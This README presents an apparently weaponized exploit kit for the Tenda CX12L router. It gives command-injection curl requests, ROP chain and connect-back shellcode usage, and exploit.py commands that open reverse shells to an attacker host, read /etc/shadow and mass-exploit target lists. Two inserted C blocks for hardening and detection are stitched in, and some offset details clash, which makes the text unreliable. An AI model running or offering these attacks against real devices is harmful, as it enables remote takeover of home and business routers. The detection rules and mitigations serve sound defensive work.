# Tenda CX12L Multi-CVE Exploit Kit (Upgraded)

**CVE-2026-11503 (fast_setting_wifi_set) | CVE-2026-11504 (fromNatlimit)**  
**Military-Grade Stack Overflow Exploitation with ROP Chain Construction**

![Severity](https://img.shields.io/badge/Severity-Critical-red)
![CVSS](https://img.shields.io/badge/CVSS-9.8-red)
![Arch](https://img.shields.io/badge/Arch-MIPS32-blue)
![Status](https://img.shields.io/badge/Status-Weaponized-red)

---

## Overview

The Tenda CX12L (AC1200) wireless router contains two independent stack-based buffer overflow vulnerabilities in its web management interface. Both are pre-authentication and allow remote code execution as root.

| CVE | Endpoint | Parameter | Overflow Type | Offset (approx) |
|-----|----------|-----------|---------------|-----------------|
| **CVE-2026-11503** | `/goform/fast_setting_wifi_set` | `wifi_ssid` | Stack buffer overflow | ~1024 bytes |
| **CVE-2026-11504** | `/goform/fromNatlimit` | `limit` | Stack buffer overflow | ~256 bytes |

**Architecture**: MIPS32 little-endian (MediaTek MT7621A SoC)  
**Protections**: Typically **no ASLR, no NX, no stack canaries** on embedded firmware

---

## Technical Details

### CVE-2026-11503: `fast_setting_wifi_set` SSID Overflow

The `fast_setting_wifi_set` handler processes WiFi quick-setup requests. The `wifi_ssid` parameter is copied into a fixed-size stack buffer without length validation.

**Vulnerable Code Pattern:**
```c
// /bin/httpd - fast_setting_wifi_set handler
int fast_setting_wifi_set(webs_t wp) {
    char ssid[256];           // Stack buffer
    char *input = websGetVar(wp, "wifi_ssid", "");
    strcpy(ssid, input);      // NO BOUNDS CHECK - OVERFLOW
    // ... saved RA at offset ~1024
}
```

**Stack Layout:**
```
[ssid buffer: 256 bytes] [padding: ~768 bytes] [saved $fp] [saved $ra] [caller $gp]
                                                      ^^^^^^ offset ~1024
```

### CVE-2026-11504: `fromNatlimit` Limit Parameter Overflow

The `fromNatlimit` handler processes NAT/bandwidth limit configuration. The `limit` parameter is copied into a small stack buffer.

**Vulnerable Code Pattern:**
```c
// /bin/httpd - fromNatlimit handler
int fromNatlimit(webs_t wp) {
    char limit_buf[64];       // Tiny stack buffer
    char *input = websGetVar(wp, "limit", "");
    strcpy(limit_buf, input); // NO BOUNDS CHECK - OVERFLOW
    // ... saved RA at offset ~256
}
```
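Hardened counterparts of the two handler patterns above, as an added example (this is not the project's code and not Tenda's firmware). The original copies the parameter with `strcpy()` into a fixed stack buffer; the fix is to reject the request before any copy when the value does not fit, and to refuse shell metacharacters so the value can never reach a `system()`/`popen()` call, which also closes the command-injection path described under Exploitation Strategy. The firmware's `webs_t`/`websGetVar` API is not modelled: the functions take the already-extracted parameter string. Buffer sizes match the page; the 32-octet SSID cap follows 802.11; `LIMIT_MAX_KBPS` and `LIMIT_MAX_DIGITS` are assumptions.

```c
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Added example, not the project's code. Hardened forms of the two handlers:
 * bounded copy with a length check before any write, plus rejection of shell
 * metacharacters. webs_t / websGetVar are not modelled. */

#define SSID_BUF_SZ      256        /* ssid[] size in the vulnerable handler */
#define LIMIT_BUF_SZ     64         /* limit_buf[] size in the vulnerable handler */
#define SSID_MAX_LEN     32         /* 802.11 maximum SSID length in octets */
#define LIMIT_MAX_DIGITS 10         /* assumed: enough digits for any 32-bit value */
#define LIMIT_MAX_KBPS   1000000UL  /* assumed upper bound for the bandwidth limit */

/* Bytes that must never be forwarded to a shell or config script. */
static const char SHELL_META[] = ";&|`$()<>\n\r\\'\"";

/* Bounded copy with validation: 0 = copied, -1 = rejected.
 * dst is always NUL-terminated, even when the input is rejected. */
int copy_param_bounded(char *dst, size_t dstsz, const char *input, size_t max_len)
{
    size_t n = 0;
    if (dst == NULL || dstsz == 0) return -1;
    dst[0] = '\0';
    if (input == NULL) return -1;
    /* Measure at most max_len+1 bytes so an attacker-sized string is never fully scanned. */
    while (n <= max_len && input[n] != '\0') n++;
    if (n > max_len || n >= dstsz) return -1;          /* does not fit: reject, no copy */
    if (strpbrk(input, SHELL_META) != NULL) return -1; /* shell metacharacters: reject */
    memcpy(dst, input, n);
    dst[n] = '\0';
    return 0;
}

/* Hardened fast_setting_wifi_set(): 0 = SSID accepted, -1 = request rejected. */
int fast_setting_wifi_set_hardened(const char *wifi_ssid)
{
    char ssid[SSID_BUF_SZ];
    if (copy_param_bounded(ssid, sizeof ssid, wifi_ssid, SSID_MAX_LEN) != 0)
        return -1;
    /* ... hand ssid to the firmware's config API (not modelled) ... */
    return 0;
}

/* Hardened fromNatlimit(): the limit is numeric, so it is parsed into a bounded
 * integer rather than kept as a raw string. Returns the value, or -1 if rejected. */
long fromNatlimit_hardened(const char *limit)
{
    char limit_buf[LIMIT_BUF_SZ];
    char *end;
    unsigned long v;
    if (copy_param_bounded(limit_buf, sizeof limit_buf, limit, LIMIT_MAX_DIGITS) != 0)
        return -1;
    v = strtoul(limit_buf, &end, 10);
    if (end == limit_buf || *end != '\0' || v > LIMIT_MAX_KBPS)
        return -1;                                     /* non-numeric, trailing junk, or out of range */
    return (long)v;
}

/* Stand-alone demo: a constructed oversized input (2047 'A's, past the ~1024-byte
 * offset named on the page) that the original handler would copy blindly. */
int oversized_ssid_demo(void)
{
    char big[2048];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return fast_setting_wifi_set_hardened(big);
}

int main(void)
{
    printf("ssid \"HomeWiFi\":      %d\n", fast_setting_wifi_set_hardened("HomeWiFi"));
    printf("ssid \"test;id\":       %d\n", fast_setting_wifi_set_hardened("test;id"));
    printf("ssid 2047 x 'A':      %d\n", oversized_ssid_demo());
    printf("limit \"1024\":        %ld\n", fromNatlimit_hardened("1024"));
    printf("limit \"1024;reboot\": %ld\n", fromNatlimit_hardened("1024;reboot"));
    return 0;
}
```

The length check runs before the copy and never scans more than `max_len + 1` bytes, so a multi-kilobyte value costs nothing and touches no stack memory; the numeric handler goes one step further and drops the string entirely once it is parsed, which removes the raw buffer as an attack surface.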

---

## Exploitation Strategy

### 1. Command Injection Fallback (Reliable)
Both endpoints also exhibit command injection via shell metacharacters (`;`, `&&`, `|`, backticks) when the overflow doesn't crash the process. This provides a **reliable pre-auth RCE** even without precise offset knowledge.

```bash
# Works on both endpoints
curl -X POST http://target/goform/fast_setting_wifi_set \
  -d "wifi_ssid=test;id"
```

### 2. Stack Overflow with ROP (Precision)
For reliable code execution with controlled registers, construct MIPS ROP chains:

**Required Gadgets (from target firmware `/bin/httpd`):**
| Gadget Type | Example Pattern | Purpose |
|-------------|-----------------|---------|
| Stack pivot | `addiu $sp, $sp, 0xXX; jr $ra` | Align stack for ROP |
| Load `$a0` | `lw $a0, offset($sp); jalr $t9` | Set filename arg |
| Load `$t9` | `lw $t9, offset($sp); jalr $t9` | Set syscall address |
| Syscall | `syscall 0x4011; jr $ra` | execve() = 4011 |

**ROP Chain Construction:**
```python
from exploit import ROPChainBuilder

builder = ROPChainBuilder(base_addr=0x00400000)
# Add resolved gadgets from target firmware
builder.add_gadget(0x00412340)  # lw $a0, 0x10($sp); jalr $t9
builder.add_gadget(0x00412344)  # lw $t9, 0x14($sp); jalr $t9
# ... chain continues
```

### 3. MIPS Connect-Back Shellcode
Template shellcode for reverse shell (customize bad chars per firmware):

```assembly
# MIPS LE connect-back shellcode
# Connect to $lhost:$lport, dup2 stdin/stdout/stderr, execve("/bin/sh")
```

---

## Repository Structure

```
tenda_cx12l_upgraded/
├── requirements.txt          # Python dependencies (pwntools, capstone, etc.)
├── scanner.py                # Async scanner with overflow offset detection
├── exploit.py                # ROP chain builder, shellcode generator, exploit
└── README.md                 # This file
```

---

## Quick Start

### 1. Install Dependencies

```bash
python3.11 -m venv .venv
source .venv/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
```

### 2. Reconnaissance Scan (Discovers Offsets)

```bash
# CIDR sweep with overflow offset detection
python scanner.py -n 192.168.1.0/24 -o scan_results.json

# Single target deep probe
python scanner.py -t 192.168.1.50

# Sample output:
# Target: 192.168.1.50
# Status: VULNERABLE (confidence: 92%)
#   >>> CVE-2026-11503 CONFIRMED (crash at 1024 bytes)
#   >>> CVE-2026-11504 CONFIRMED (crash at 256 bytes)
#   → http/80: Tenda CX12L Web UI
```

### 3. Exploitation

```bash
# Command injection fallback (works immediately)
python exploit.py -t 192.168.1.50 -c "id; cat /etc/passwd" --cve 11503

# Stack overflow reverse shell (requires offset from scanner)
python exploit.py -t 192.168.1.50 --reverse --lhost 10.0.0.5 --lport 4444 \
  --offset-11503 1024 --offset-11504 256

# Mass exploitation with discovered offsets
python exploit.py -f targets.txt --reverse --lhost 10.0.0.5 -o exploit_results.json
```

---

## Exploit Module API

### Direct Function Calls

```python
from exploit import (
    exploit_cve2026_11503,
    exploit_cve2026_11504,
    run_exploit_chain,
    mass_exploit,
    ROPChainBuilder,
    generate_mips_shellcode,
)

# Command injection fallback
ok, output = exploit_cve2026_11503("192.168.1.50", command="id")
ok, output = exploit_cve2026_11504("192.168.1.50", command="cat /etc/shadow")

# Stack overflow reverse shell
ok, output = exploit_cve2026_11503("192.168.1.50", offset=1024,
                                   lhost="10.0.0.5", lport=4444)
ok, output = exploit_cve2026_11504("192.168.1.50", offset=256,
                                   lhost="10.0.0.5", lport=4444)

# ROP chain builder
builder = ROPChainBuilder(base_addr=0x00400000)
builder.add_gadget(0x00412340)  # Resolved from target firmware
chain = builder.build_execve_chain("sh", cmd_addr)

# MIPS shellcode generation
shellcode = generate_mips_shellcode("10.0.0.5", 4444)

# Orchestrated chain
sessions = run_exploit_chain("192.168.1.50", cve="all", reverse_shell=True,
                             lhost="10.0.0.5", lport=4444,
                             offset_11503=1024, offset_11504=256)

# Parallel mass exploitation
results = mass_exploit(["192.168.1.50", "192.168.1.51"], reverse_shell=True,
                       lhost="10.0.0.5", lport=4444)
```

---

## Offset Determination

The scanner automatically tests increasing buffer sizes to find crash offsets:

```
Testing CVE-2026-11503 (wifi_ssid):
  OK at 64 bytes: HTTP 200
  OK at 128 bytes: HTTP 200
  OK at 256 bytes: HTTP 200
  OK at 512 bytes: HTTP 200
  Crash at 1024 bytes: Timeout (possible crash)
  
Result: CVE-2026-11503 crash offset = 1024 bytes
```

Use these offsets with `--offset-11503` and `--offset-11504` for reliable exploitation.

---

## Detection & Mitigation

### Network Indicators

| Indicator | Description |
|-----------|-------------|
| HTTP POST `/goform/fast_setting_wifi_set` | Large `wifi_ssid` parameter (>512 bytes) |
| HTTP POST `/goform/fromNatlimit` | Large `limit` parameter (>128 bytes) |
| Process crash/restart | `httpd` process restart after malformed request |

### YARA Rule

```yara
rule Tenda_CX12L_StackOverflow {
    strings:
        $ep1 = "/goform/fast_setting_wifi_set" nocase
        $ep2 = "/goform/fromNatlimit" nocase
        $param1 = "wifi_ssid" nocase
        $param2 = "limit" nocase
        $overflow = {41 41 41 41 41 41 41 41}  // AAAAAAAA pattern
    condition:
        any of ($ep*) and any of ($param*) and $overflow
}
```
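The indicators in the table above and the filler pattern in the YARA rule can be checked directly on the wire, before a request reaches the router. The classifier below is an added example, not the project's code: for a POST to either goform endpoint it measures the named form parameter against the table's threshold (512 bytes for `wifi_ssid`, 128 for `limit`) and separately flags a run of eight or more identical bytes inside the value, the equivalent of the rule's `AAAAAAAA` hex string. The form body is assumed to be already percent-decoded, and every sample request is constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not the project's code: applies the Network Indicators table
 * and the YARA filler check to raw HTTP requests. Body is taken as already
 * percent-decoded; thresholds come from the table. */

enum { ALERT_NONE = 0, ALERT_OVERSIZED = 1, ALERT_FILLER = 2 };

struct watch { const char *path; const char *param; size_t max_len; };

static const struct watch WATCHLIST[] = {
    { "/goform/fast_setting_wifi_set", "wifi_ssid", 512 },
    { "/goform/fromNatlimit",          "limit",     128 },
};
#define NWATCH (sizeof WATCHLIST / sizeof WATCHLIST[0])

/* Find key in a "k=v&k2=v2" body; returns the value start and sets *len, or NULL. */
static const char *form_value(const char *body, const char *key, size_t *len)
{
    size_t klen = strlen(key);
    const char *p = body;
    while (p != NULL && *p != '\0') {
        const char *amp = strchr(p, '&');
        size_t seglen = amp ? (size_t)(amp - p) : strlen(p);
        if (seglen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            *len = seglen - klen - 1;
            return p + klen + 1;
        }
        p = amp ? amp + 1 : NULL;
    }
    return NULL;
}

/* Length of the longest run of one repeated byte in buf[0..len). */
static size_t longest_run(const char *buf, size_t len)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (i > 0 && buf[i] == buf[i - 1]) ? run + 1 : 1;
        if (run > best) best = run;
    }
    return best;
}

/* Classify one request: returns a bitmask of ALERT_* flags. */
int classify_request(const char *method, const char *path, const char *body)
{
    int flags = ALERT_NONE;
    if (strcmp(method, "POST") != 0) return flags;
    for (size_t i = 0; i < NWATCH; i++) {
        size_t vlen = 0;
        const char *v;
        if (strcmp(path, WATCHLIST[i].path) != 0) continue;
        v = form_value(body, WATCHLIST[i].param, &vlen);
        if (v == NULL) continue;
        if (vlen > WATCHLIST[i].max_len) flags |= ALERT_OVERSIZED;
        if (longest_run(v, vlen) >= 8) flags |= ALERT_FILLER;
    }
    return flags;
}

/* Build a constructed POST to WATCHLIST[idx] whose parameter is n bytes of the
 * given pattern repeated, and classify it. Returns -1 on bad arguments. */
int demo_request(size_t n, const char *pattern, size_t idx)
{
    static char body[4096];
    size_t plen = strlen(pattern), off;
    if (plen == 0 || idx >= NWATCH) return -1;
    if (n + strlen(WATCHLIST[idx].param) + 2 > sizeof body) return -1;
    off = (size_t)snprintf(body, sizeof body, "%s=", WATCHLIST[idx].param);
    for (size_t i = 0; i < n; i++) body[off + i] = pattern[i % plen];
    body[off + n] = '\0';
    return classify_request("POST", WATCHLIST[idx].path, body);
}

int main(void)
{
    printf("benign setup:    %d\n", classify_request("POST", "/goform/fast_setting_wifi_set",
                                                     "wifi_ssid=HomeWiFi&wifi_pwd=secret"));
    printf("1024 x 'A' ssid: %d\n", demo_request(1024, "A", 0));
    printf("600 x 'ab' ssid: %d\n", demo_request(600, "ab", 0));
    printf("200 x 'B' limit: %d\n", demo_request(200, "B", 1));
    return 0;
}
```

The two flags are deliberately independent: an oversized value with no repeated bytes still trips the length check, and a short value padded with filler still trips the run check, so neither a packed payload nor a small probe slips through because the other signal is absent. Because the key is matched only at the start of a `&`-separated segment and must be followed by `=`, the generic name `limit` does not collide with parameters such as `limit_type`.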

### Mitigations

1. **Immediate**: Disable remote management (WAN access to web UI)
2. **Firmware**: Update to latest Tenda release (check tendacn.com)
3. **Network**: Isolate management interface on separate VLAN
4. **WAF/IDS**: Deploy signatures for oversized parameters on goform endpoints
5. **Monitor**: Log all POST requests to `/goform/*` endpoints

---

## Weaponization Notes

| Feature | Implementation |
|---------|----------------|
| **Offset Discovery** | Scanner auto-detects crash offsets via progressive payload sizing |
| **Dual Vector** | Command injection fallback + precision stack overflow |
| **MIPS ROP Framework** | `ROPChainBuilder` class for gadget chaining |
| **Shellcode Generator** | `generate_mips_shellcode()` for connect-back payloads |
| **Bad Char Handling** | Payload encoding for HTTP POST (latin-1 preservation) |
| **Firmware Adaptation** | Base address configurable for PIE/ASLR targets |

---

## Legal & Ethics

This toolkit is provided for:
- Authorized penetration testing of infrastructure you own
- CISA/NCC/NCSC-aligned defensive research
- Detection rule development and purple-team exercises
- Red team / bug bounty programmes with explicit written scope

**Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide.

---

## References

| CVE | Description |
|-----|-------------|
| CVE-2026-11503 | Tenda CX12L fast_setting_wifi_set Stack Buffer Overflow |
| CVE-2026-11504 | Tenda CX12L fromNatlimit Stack Buffer Overflow |

---

## Version History

| Version | Date | Changes |
|---------|------|---------|
| 2.0.0 | 2026-06-13 | Complete rewrite: async scanner with offset detection, ROP framework, MIPS shellcode gen |
| 1.0.0 | 2026-06-10 | Initial release (basic overflow PoC) |

---

## Author

Advanced Persistent Security Research  
Military-grade exploit engineering for authorized assessment only.